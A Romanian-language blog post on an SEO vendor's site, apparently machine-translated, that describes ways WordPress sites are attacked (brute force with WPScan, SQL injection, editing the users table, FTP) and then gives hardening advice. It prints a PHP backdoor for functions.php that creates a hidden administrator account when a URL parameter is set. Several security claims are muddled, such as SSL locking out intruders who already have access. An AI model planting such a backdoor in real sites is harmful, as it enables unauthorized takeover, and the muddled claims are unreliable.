• WordPress

Cum să spargi WordPress?

  • Felix Rose-Collins
  • 10 min read
Cum să spargi WordPress?

Introducere

Înainte de a începe acest articol, am dori să știți că hacking-ul este ilegal și că noi nu motivăm și nu încurajăm nicio activitate răuvoitoare. Acest articol are ca unic scop dobândirea de cunoștințe despre modul în care lucrează escrocii și despre modul în care metodele variate de securitate a site-ului sunt esențiale pentru a-i ține la distanță. Haideți să discutăm:

  • Cum fac escrocii să spargă WordPress?
  • Cum să vă protejați site-ul WP de escroci?

Așadar, fără alte comentarii, să începem cu subiectul.

Cum să Hack WordPress Website Online?

How to Hack WordPress Website Online (Sursa: wpsecurityninja.com)

Utilizarea WPScan:

WPScan este un scaner de securitate WP care ajută proprietarii de site-uri să verifice dacă site-ul lor WordPress prezintă vulnerabilități, dar acest scaner este, de asemenea, utilizat de hackeri pentru a-și îndeplini motivele de a sparge site-uri web.

WPScan permite proprietarilor și administratorilor de site-uri să specifice conturile de utilizator WP și parolele de forțare brută și reprezintă cel mai important pas în obținerea accesului neautorizat la conturile WP.

Brute force username and password using WPScan (Forțare brută a numelui de utilizator și a parolei folosind WPScan. Sursa: Medium)

Atacuri MIM:

Atacurile de tip "man-in-middle" (MIM) pot fi efectuate cu ușurință în cazul în care utilizatorii utilizează rețele locale similare. Conexiunile de utilizator necriptate sunt o țintă ușoară, deoarece toate detaliile sunt vizibile în text simplu.

Software-ul implicat în desfășurarea acestor tipuri de atacuri poate detecta teme și plugin-uri compromise și poate enumera utilizatorii.

MIM Attacks (Sursa: Medium)

Injecții SQL:

Atacurile de injecție SQL sunt considerate cele mai importante atacuri utilizate pentru penetrarea site-urilor web. Aceste atacuri vizează gateway-urile backend ale site-ului web și le permit hackerilor să le penetreze prin implementarea unor comenzi compromise.

SQL Injections (Sursa: secure.wphackedhelp.com)

Faceți cunoștință cu Ranktracker

Platforma All-in-One pentru un SEO eficient

În spatele fiecărei afaceri de succes se află o campanie SEO puternică. Dar, având în vedere că există nenumărate instrumente și tehnici de optimizare din care puteți alege, poate fi greu să știți de unde să începeți. Ei bine, nu vă mai temeți, pentru că am exact ceea ce vă poate ajuta. Vă prezentăm platforma Ranktracker all-in-one pentru un SEO eficient

Am deschis în sfârșit înregistrarea la Ranktracker absolut gratuit!

Creați un cont gratuit

Sau Conectați-vă folosind acreditările dvs.

Aceste penetrări permit, de asemenea, hackerilor să modifice bazele de date și comenzile și să șteargă sau să fure informații de pe site.

Deoarece aceste atacuri SQL identifică site-urile vulnerabile și neprotejate, ele facilitează sarcina de piratare și asigură succesul.

Utilizarea My SQL/cPanel:

Prin această metodă, hackerii creează un cont fals sau modifică parola unui utilizator actual al site-ului WP. Hackerii încearcă să pătrundă prin intermediul cPanelului, deschizând PhpMyAdmin. Aceștia caută tabelul care se termină în _users și găsesc utilizatorul pe care doresc să îl modifice.

Acest lucru le va permite să schimbe datele de identificare ale utilizatorului pe care intenționează să îl pirateze. Aceștia urmăresc utilizatorul și schimbă parola utilizatorului (din câmpul user_pass) deschizând generatorul MD5 online și o înlocuiesc cu cea dorită, iar mai târziu fac clic pe #.

Utilizing My SQL/cPanel (Numele de utilizator, parolele hașurate ale utilizatorilor, ID-urile de e-mail ale acestora etc. sunt toate stocate în tabelul wp_users din baza de date. Sursa: firstsiteguide.com)

Numele de utilizator, parolele hașurate ale utilizatorilor, ID-urile de e-mail ale acestora etc. sunt toate stocate în tabelul wp_users din baza de date.

Editarea Functions.php:

Hackerii accesează, de asemenea, cPanelul pentru a modifica fișierul Functions.php. Prin deblocarea Managerului de fișiere, aceștia vânează dosarul temei active. Din dosarul public_html/wp_content/themes, aceștia urmăresc tema și modifică fișierul functions.php, plasând codul lor compromis. Piratarea este deja în curs de desfășurare, deoarece hackerii au creat un cont nou. După ce au terminat, aceștia șterg codul compromis.

Creați un nou cont de utilizator prin FTP:

În general, conturile FTP îi ajută pe proprietarii de site-uri să genereze un director în cadrul site-ului lor, care permite anumitor utilizatori să încarce/descarce fișiere folosind datele lor de autentificare.

Aceste fișiere sunt, de asemenea, vizualizate pe internet.

Pași pentru a crea un cont FTP pe site:

  • Introduceți datele dorite
  • Introduceți numele de utilizator al noului utilizator FTP
  • Introduceți parola pentru alocarea contului de acces prin FTP
  • Introduceți numele directorului pentru a permite accesul prin FTP
  • Scrieți spațiul în MB pe care doriți să-l alocați acestui dosar.
  • Ulterior, apăsați butonul "Create" pentru a crea noul cont.

Datele menționate mai jos trebuie să fie încărcate de noul utilizator pentru a obține acces prin FTP.


Adresă / Host Name / Adresa: yourdomain.com sau ftp.yourdomain.com User / Utilizator: [email protected] Parola: El parola atribuită acestui cont FTP

Port: 21Numește folderul pentru încărcarea/descărcarea fișierelor.


Noul utilizator va avea permisiuni de citire și scriere atât asupra directorului ales, cât și asupra tuturor subdirectoarelor pe care le conține. De exemplu, dacă creați utilizatorul client și îi acordați acces la directorul / home / user / public_html

Pătrunderea prin Backdoor:

O modalitate răuvoitoare de a pătrunde pe site este prin intermediul backdoor-ului. Fie că este vorba de un escroc care dorește să obțină acces la site-ul dvs., fie că este vorba de un utilizator victimă, care dorește să redobândească accesul la site-ul său prin intrarea backdoor, ambii trebuie să urmeze pașii de mai jos.

Faceți cunoștință cu Ranktracker

Platforma All-in-One pentru un SEO eficient

În spatele fiecărei afaceri de succes se află o campanie SEO puternică. Dar, având în vedere că există nenumărate instrumente și tehnici de optimizare din care puteți alege, poate fi greu să știți de unde să începeți. Ei bine, nu vă mai temeți, pentru că am exact ceea ce vă poate ajuta. Vă prezentăm platforma Ranktracker all-in-one pentru un SEO eficient

Am deschis în sfârșit înregistrarea la Ranktracker absolut gratuit!

Creați un cont gratuit

Sau Conectați-vă folosind acreditările dvs.

În cazurile în care se creează un nou cont de utilizator prin FTP sau se face o resetare a parolei, dar nu se obțin rezultatele dorite, este posibil ca utilizatorul să dorească să spargă site-ul prin intrare prin ușa din spate și să-și recupereze accesul de administrator.

Pași pentru a crea Backdoor:

  • Deschideți fișierul functions.php și inserați codul menționat mai jos.
add_action('wp_head', 'wploop_backdoor'); 
function wploop_backdoor() {
If ($_GET['backdoor'] == 'knockknock') {
require('wp-includes/registration.php');
If (!username_exists('username')) {
$user_id = wp_create_user('name', 'pass');
$user = new WP_User($user_id);
$user->set_role('administrator');
}
}
}
?>
  • Salvați ulterior modificările.

Crypto Jacking & Cryptocurrency Mining:

Popularitatea criptomonedelor a dat naștere la noi amenințări cibernetice, cum ar fi crypto-jacking, care este, de asemenea, denumit malware pentru extragerea criptomonedelor.

Acțiunea de a confisca un computer împotriva dorinței utilizatorului, precum și a conștientizării acestuia, se numește crypto-jacking. În cazul cripto-jacking malware, escrocii infectează calculatorul utilizatorului cu programe malware rău intenționate, livrate prin intermediul unui software pentru compromiterea sistemelor și rețelelor.

Phishing:

Phishing-ul este o metodă prin care escrocii păcălesc utilizatorii de informațiile lor sensibile (credențiale de conectare, număr de cont social, PIN, detalii despre cardul de credit etc.), dându-se drept persoane juridice. De obicei, aceștia recurg la e-mailuri pentru a-și îndeplini scopul.

Exemplu: Un escroc poate să se dea drept o sursă de încredere și să colecteze date personale de la utilizatori pentru a le îndeplini dorințele. De asemenea, poate introduce un link greșit în e-mailul de phishing și îi poate direcționa pe aceștia către un site fraudulos pentru a livra programe malware.

Malware:

Statisticile de securitate WordPress indică faptul că 4000 de site-uri web WP sunt infectate de malware din cauza unor plugin-uri SEO false.

Escrocii nu au nevoie de o sursă pentru a livra programe malware. Plugin-urile SEO, temele WP și mulți alți factori prezenți pe site i-au motivat pe hackeri să folosească recentul malware WP-VCD.

Chiar și e-mailurile de phishing sunt porți de acces pentru livrarea de programe malware.

Și în acest caz, motto-ul hackerilor este același, și anume, obținerea de date sensibile de la utilizatori prin penetrarea sistemelor și furtul de informații.

WordPress Ransomware:

În cazul ransomware-ului WP, hackerii folosesc programe malware pentru a bloca accesul utilizatorilor la sisteme și rețele. Acesta poate fi recuperat de către utilizator prin plata unei răscumpărări, așa cum cere hackerul.

Exemplu: Atacul Petya, prin care hackerul vă criptează fișierele și datele și cere o răscumpărare în schimbul cheii de decriptare.

Atac Cross-Site Scripting (XSS):

Atacurile XSS sunt efectuate de hackeri prin injectarea de conținut malițios în site-ul web, exploatând astfel browserul. Acest atac permite hackerului să fure date din cookie-uri, să modifice conținutul site-ului și să captureze site-ul web pentru a obține date sensibile.

Clickjacking:

În cazul clickjacking, hackerul face o încercare rău intenționată de a compromite un buton/link și îl determină pe utilizator să facă clic pe obiectul compromis, ceea ce îi permite hackerului să execute comenzi rău intenționate pentru a obține acces la datele sensibile ale utilizatorului.

Spoofing:

Spoofing-ul este un atac prin care o persoană se deghizează ca fiind o identitate de încredere pentru a obține beneficii ilegale de pe urma utilizatorului și pentru a-l păcăli să prezinte informații confidențiale.

Pentru a preveni toate aceste atacuri de hacking, trebuie luate măsuri de securitate specifice pentru a vă securiza site-ul WP.

Cum să securizați site-ul WordPress de la hacking?

How to Secure WordPress Website from Hacking? (Sursa: envisagedigital.co.uk)

Statisticile de mai sus sunt suficiente pentru a indica popularitatea WordPress. Această popularitate este cea care face ca această platformă CMS să fie mai dorită în rândul hackerilor, care încearcă metode variate de hacking pentru a obține acces la site-urile WP și la datele acestora.

Prin urmare, este esențial să știți cum să împiedicați hackerii să vă acceseze site-ul WP.

Asigurați-vă site-ul WP cu certificat SSL:

Atunci când orice date sunt încărcate pe site, acestea sunt întotdeauna în text simplu, ceea ce este ușor de văzut pentru toți, inclusiv pentru hackeri. Acest lucru poate fi riscant, deoarece hackerii pot utiliza în mod abuziv datele de pe site-ul dvs.

Certificatele SSL (Secure Socket Layers) sunt acele certificate digitale care ajută la securizarea site-ului dvs. WP cu o securitate de criptare pe 256 de biți, convertind astfel datele site-ului dvs. într-un format codificat.

Hackerii nu pot citi codurile, deși au obținut acces la site-ul dvs. și, prin urmare, sunt forțați să părăsească astfel de site-uri.

Secure your WP site with SSL Certificate (Sursa: clickssl.net)

Selectați marca dorită de certificat SSL (Comodo, Thawte, RapidSSL, etc.) și instalați-l pe site-ul WP. În cazul tipului de certificat SSL, trebuie să înțelegeți care sunt domeniile și subdomeniile. De exemplu, dacă site-ul dvs. WP are subdomenii, atunci, un singur certificat Wildcard ieftin, care costă doar 45 $/an aproximativ, vă poate securiza întreaga afacere digitală.

Emiterea rapidă, criptarea cu cheie pe 2048 de biți, creșterea SEO, sigiliul de încredere al site-ului, compatibilitatea cu 99% din browsere/mobile, politica de rambursare și garanția sunt câteva dintre caracteristicile și beneficiile instalării certificatelor Wildcard SSL.

Mărcile și opțiunile variate de produse SSL, tarifele prietenoase cu bugetul și serviciul clienți excelent sunt câteva dintre beneficiile abordării magazinului ClickSSL pentru securizarea site-ului WP.

Actualizați-vă angajații:

Erorile umane pot fi dezastruoase, așa că asigurați-vă întotdeauna că vă țineți angajații la curent cu cele mai recente amenințări cibernetice pentru a evita ca aceștia să fie vulnerabili.

Dacă angajații dvs. pot depista semnalele suspecte ale unui site web piratat în stadiul inițial, ei pot informa persoanele în cauză și pot preveni daunele suplimentare aduse site-ului și afacerii dvs.

Utilizați autentificarea cu doi factori (2FA):

Implementarea 2FA în timpul autentificării pe site este cel mai important mod de a preveni atacurile prin forță brută. Pe lângă faptul că adaugă un alt nivel de securitate, acestea previn, de asemenea, datele site-ului și ale utilizatorului.

Acest lucru se datorează faptului că, dacă un strat de securitate este compromis, escrocul trebuie să invadeze cel de-al doilea strat pentru a obține acces la site-ul web.

Aceasta este o decizie dificilă și, prin urmare, în majoritatea cazurilor, escrocii sfârșesc prin a se muta pe alte site-uri slab securizate.

Sfat: WP 2FA este un plugin WP gratuit care oferă un nivel suplimentar de securitate pentru site-ul dvs. WP.

Auditați în mod regulat utilizatorii administratori:

Acest lucru este important pentru securitatea site-ului WP. Asigurați-vă că auditați în mod regulat utilizatorii administratori și verificați încrucișat accesele acestora.

De asemenea, asigurați-vă că utilizatorii și angajații au acces limitat în funcție de sarcinile lor, pentru a preveni breșele de securitate.

Actualizați WordPress Core în mod regulat:

Nu sunteți la curent cu WP Core?

Permiteți-mi să vă informez că WP Core include toate fișierele de bază necesare pentru ca WP să funcționeze.

Lista de fișiere din fișierul WP zip descărcat de pe WordPress.org

Update WordPress Core Regularly (Sursa: ithemes.com)

Aceste fișiere de bază trebuie să fie actualizate în mod regulat după lansarea actualizărilor de securitate, pentru a remedia toate vulnerabilitățile de securitate.

Descărcați teme și plugin-uri WP din surse de încredere:

Acest lucru este esențial, deoarece plugin-urile pot fi amenințătoare atunci când nu sunt actualizate sau sunt instalate din surse care nu sunt de încredere. În cazul în care utilizați plugin-uri gratuite/plătite, verificați întotdeauna factorii menționați mai jos, cum ar fi:

  • Evaluări și recenzii ale utilizatorilor
  • Ușurința de utilizare
  • Compatibilitate
  • Securitate
  • Încredere

Download WP Themes & Plugins from Trustworthy Sources (Sursa: torquemag.io)

Aceeași regulă se aplică și la instalarea temelor WP.

Actualizați temele și plugin-urile WP în mod regulat:

Temele și plugin-urile WP depășite sau expirate reprezintă întotdeauna o amenințare pentru site-ul WP, deoarece acestea își pierd standardele de securitate. Pentru a împiedica hackerii să folosească astfel de porți de acces pentru a răspândi programe malware pentru a obține acces la site, asigurați-vă că actualizați periodic temele și pluginurile utilizate în site-ul dvs. WP.

Acest lucru va ajuta plugin-ul să funcționeze corect și să rămână sincronizat cu cele mai recente versiuni de WP.

Sfat: Pe pagina de pluginuri, puteți vedea toate pluginurile instalate și un link care indică "Enable auto-updates" (Activați actualizările automate) în dreptul fiecărui plugin. Activați-l pentru actualizări automate.

Modificați numele implicit al administratorului:

Hackerii sunt prea deștepți și pot pătrunde cu ușurință pe site-ul WP folosind numele implicit al administratorului. Este întotdeauna de preferat să modificați numele de utilizator implicit al administratorului pentru a împiedica hackerii să execute atacuri de forță brută pentru a obține acces neautorizat la site-ul dvs. web.

Acordarea accesului limitat:

Nu acordați niciodată mai mult decât este necesar și aceeași regulă se aplică și în cazul acordării accesului la site atât utilizatorilor, cât și angajaților.

Controlul accesului este cea mai importantă regulă a securității site-ului și a datelor, deoarece definește cine poate sau nu poate accesa site-ul web. Blocați toate intrările la WP admin și la alte coduri și date critice pentru securitatea site-ului.

Accesul limitat nu numai că îmbunătățește productivitatea, dar vă protejează și site-ul de intrările rău intenționate.

Actualizați WordPress:

Atunci când WordPress nu este actualizat, site-ul dvs. riscă să fie invadat de hackeri.

WordPress deține 37% din cota de piață și continuă să lanseze în mod regulat actualizări pentru a remedia găurile de securitate și bug-urile. Aceste actualizări includ, de asemenea, noi caracteristici și îmbunătățiri ale celor existente, care sunt utile pentru a spori performanța site-ului dvs.

Faceți cunoștință cu Ranktracker

Platforma All-in-One pentru un SEO eficient

În spatele fiecărei afaceri de succes se află o campanie SEO puternică. Dar, având în vedere că există nenumărate instrumente și tehnici de optimizare din care puteți alege, poate fi greu să știți de unde să începeți. Ei bine, nu vă mai temeți, pentru că am exact ceea ce vă poate ajuta. Vă prezentăm platforma Ranktracker all-in-one pentru un SEO eficient

Am deschis în sfârșit înregistrarea la Ranktracker absolut gratuit!

Creați un cont gratuit

Sau Conectați-vă folosind acreditările dvs.

Why you should always update your wordpress (Sursa: wpbeginner.com)

Păstrați site-ul WP actualizat pentru o securitate robustă.

Încheiere:

Folosiți parole puternice și complexe și păstrați site-ul WP, precum și plugin-urile și temele actualizate pentru a remedia toate deficiențele de securitate. Alocați-vă timp pentru a vă educa angajații, deoarece acest lucru va ajuta întotdeauna la prevenirea dezastrelor.

Nu pierdeți niciodată din vedere securitatea și asigurați-vă întotdeauna că folosiți cele mai bune și de încredere plugin-uri de securitate pentru a vă păstra site-ul WP în siguranță față de ochii curioși. În plus, asigurați-vă site-ul cu SSL pentru a spori încrederea clienților, afacerea și SEO.

Acum că sunteți conștienți de modul în care funcționează hackerii, sperăm că acest articol vă ajută să preveniți pătrunderea hackerilor pe site-ul dvs. și să vă gestionați site-ul WP într-un mod sigur.

Felix Rose-Collins

Felix Rose-Collins

Ranktracker's CEO/CMO & Co-founder

Felix Rose-Collins is the Co-founder and CEO/CMO of Ranktracker. With over 15 years of SEO experience, he has single-handedly scaled the Ranktracker site to over 500,000 monthly visits, with 390,000 of these stemming from organic searches each month.

Începeți să utilizați Ranktracker... Gratuit!

Aflați ce împiedică site-ul dvs. să se claseze.

Creați un cont gratuit

Sau Conectați-vă folosind acreditările dvs.

Different views of Ranktracker app